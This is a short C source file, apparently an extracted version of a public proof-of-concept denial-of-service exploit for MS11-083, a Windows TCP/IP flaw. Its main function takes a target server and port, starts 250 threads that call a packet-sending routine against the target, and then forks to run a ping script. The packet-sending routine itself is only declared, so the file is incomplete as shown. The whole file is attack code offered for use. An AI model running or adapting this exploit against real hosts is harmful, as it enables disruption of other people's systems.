
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int pthread_t ;
typedef scalar_t__ pid_t ;


 scalar_t__ active ;
 int atoi (char*) ;
 int execve (char*,char* const*,char* const*) ;
 int exit (int) ;
 scalar_t__ fork () ;
 int port ;
 int printf (char*,...) ;
 int pthread_create (int *,int *,int ,char*) ;
 int sendpackets ;
 int sleep (int) ;

int main(int argc, char *argv[]) {
       pthread_t thread;
       int iret,lthreads;
  pid_t pid;
  printf("[+] MS11-083 DoS/PoC exploit\n");
  if(argc<3){
    printf("[!] Usage : %s <server> <port>\n", argv[0]);
    exit(1);
  }
  char *const args[] = {"ping",argv[1],((void*)0)};
  char *const envp[] = {"",((void*)0)};
  port = atoi(argv[2]);
  for(lthreads=0;lthreads<250;lthreads++){
    iret = pthread_create(&thread,((void*)0),sendpackets,argv[1]);
    printf("[-] Thread number %d started\n",lthreads);
    sleep(1);
  }
  printf("[-] One does not simply barrel roll into Mordor\n");
  pid = fork();
  if(pid==0){
    execve("./ping.sh",args,envp);
  };
  while(active){
  }
  printf("[-] You are finished. Patience is a virtue.\n");
  exit(0);
}
